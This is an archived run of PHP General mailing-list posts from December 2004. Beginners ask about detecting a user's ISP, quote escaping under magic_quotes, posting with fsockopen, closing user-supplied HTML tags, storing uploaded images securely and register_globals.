the ISP?  Or Perhaps using a whois,,, doesn't some versions of whois use IP
address?  Intriguing question,,,

Warren Vail

> -Original Message-
> From: John Nichel [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, December 09, 2004 5:04 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [PHP] ISP snippet
> 
> 
> Brad Ciszewski wrote:
> > i need help to figure out the isp of a user. can anyone 
> help me with 
> > this?
> 
> Maybe you can ask the user real nice.
> 
> -- 
> By-Tor.com
> ..it's all about the Rush
> http://www.by-tor.com
> 
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Forms In PHP

[Wil Hitchman]

Hi, 

I created a web form in PHP and used a couple of email addresses.  The only 
email address that worked when I submitted to the form (for testing purposes) 
was my Yahoo address.  My AOL, hotmail and other work addresses did not work.  
Can someone tell me why?

Thanks, 

Wil

[PHP] Re: How to post quote/double quote mark?

[Shen Kong]

Hi, because your magic_quotes_gpc = on, so, do this:
$A = stripslashes($_POST['A']);
here is a function I use , maybe useful for you:
function returnInfo($info) {
if (!get_magic_quotes_gpc()) {
if (is_array($info)) {
$info = array_map("trim", $info);
return array_map("htmlspecialchars", $info);
} else {
return htmlspecialchars(trim($info));
}
} else {
if (is_array($info)) {
$info = array_map("trim", $info);
$info = array_map("htmlspecialchars", $info);
return array_map("stripslashes", $info);
} else {
return stripslashes(htmlspecialchars(trim($info)));
}
}
}
Minghua Yao wrote:
Hi, 

I used the following function to post a string variable "abcdef" to a PHP program on another host: 

	function PostToHost($host, $path, $data_to_send) {
  		$fp = fsockopen($host,80);

  		if(!$fp) { 
	  		echo "Failed to open port"; 
	  		exit; 
	  	} 
  		
  		fputs($fp, "POST $path HTTP/1.1\n");
  		fputs($fp, "Host: $host\n");
  		fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
  		fputs($fp, "Content-length: ".strlen($data_to_send)."\n");
  		fputs($fp, "Connection: close\n\n");
  		fputs($fp, "$data_to_send\n");

$res = "";
while(!feof($fp)) {
$res .= fgets($fp, 128);
}

fclose($fp);
return $res;
}
 $x = "A = \"abcdef\"";
 $y= PostToHost02("host/name", "/path/to/test.php", $x);
 echo $y;
?>
"/path/to/test.php" on "host/name" is as follows.

echo $_POST['A']; 
?>

It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone please tell me 
how to pass "abcdef" to test.php?
Thanks in advance.
-Minghua



--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Matt Palermo]

 I would like to leave any HTML in there, but just make sure that ending 
tags exist, so it doesn't screw up the rest of the page.  Strip tags would 
just wipe out the HTML rather than allowing it and ending it safely.


"Richard Lynch" <[EMAIL PROTECTED]> wrote in message 
news:[EMAIL PROTECTED]
> Matt Palermo wrote:
>> I am allowing users to imput HTML code into a textarea.  After they input
>> this, I wany to output their HTML to the browser.  In order for the
>> document
>> to be safe, I need to close all open HTML tags that have been left open 
>> by
>> the user, along with any open comments.  Is there a way to take an HTML
>> string and add closing tags and comments to it if needed?
>
> After you use http://php.net/tidy to fix the HTML, use
> http://php.net/strip_tags to rip out all but the handful of tags you
> really want to allow them to use, most especially any JavaScript they
> might shove in to attack your (and my!) server.
>
> I *think* strip_tags rips out JavaScript.   RTFM to be sure.
>
> -- 
> Like Music?
> http://l-i-e.com/artists.htm 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re[2]: [PHP] How do you work this thing

[Tom Rogers]

Hi,

Friday, December 10, 2004, 11:05:50 AM, you wrote:


RC> No, no, no, we want to keep the earth clean... a dynamo and pedals ought
RC> to give him an unlimited renewable energy source.


Maybe he has one with pedals and that's what he can't get to work?

-- 
regards,
Tom

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Chris Shiflett]

--- I l <[EMAIL PROTECTED]> wrote:
> the best security practice is to store the jpg file or any other
> uploaded file in your mySql database. This way you never have
> to worry about someone executing php by the url like
> www.example.com/pic.jpg. To view the file, the user would type
> www.example.com/veiw.php?fileID=3425433345.

That's the best? :-)

While I have a great deal of confidence in my code as well, I find it odd
that you trust your own PHP code more than something like Apache, which
has been tested by millions of people worldwide and is very mature.

I would argue that it's more likely that you'll make a mistake in view.php
than it is that you will misconfigure Apache to process images as PHP.

Security is all about knowing what you can trust and what you cannot. A
mistrust of everything (paranoid security) is not a good solution, and
when there is a choice, the one with less risk is more secure. In this
case, I don't agree with your decision. I would put my trust in Apache.

> I cann't really see any security problems here.

There are security concerns with everything, even if they're hypothetical
(e.g., even when you can't discover an exploit). Be careful not to ever
get too comfortable. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] I'm Back i'm beginner and i couldn't solve the problem

[Mecnun]

hi again, I tried all the corrections that you showed me. Nothing worked and I 
uploaded my scripts to a web hosting server and I saw that my scripts run on 
that server quiet well. 
Every script works on my machine, if I dont use $_POST[].
 
For example if I try to run that code:
 
'; 
echo 'Arnol said that: "I\'ll be back"';
?>
 
It runs, there is no problem, but if I run that one:
 
 $_POST[user]  \n\n";
print "Your address is:\n\n  $_POST[address] ";
?>
 
Only "Welcome" and "Your address is"   printed. 
The data that I enter into the form is not received.
Do you have any idea, what kind of configuration mistake that I've done?


-
Do you Yahoo!?
 Read only the mail you want - Yahoo! Mail SpamGuard.

Re: [PHP] I'm Back i'm beginner and i couldn't solve the problem

[Santa]

В сообщении от Пятница 10 Декабрь 2004 05:57 Mecnun написал(a):

hint -> php.ini -> register_globals = Off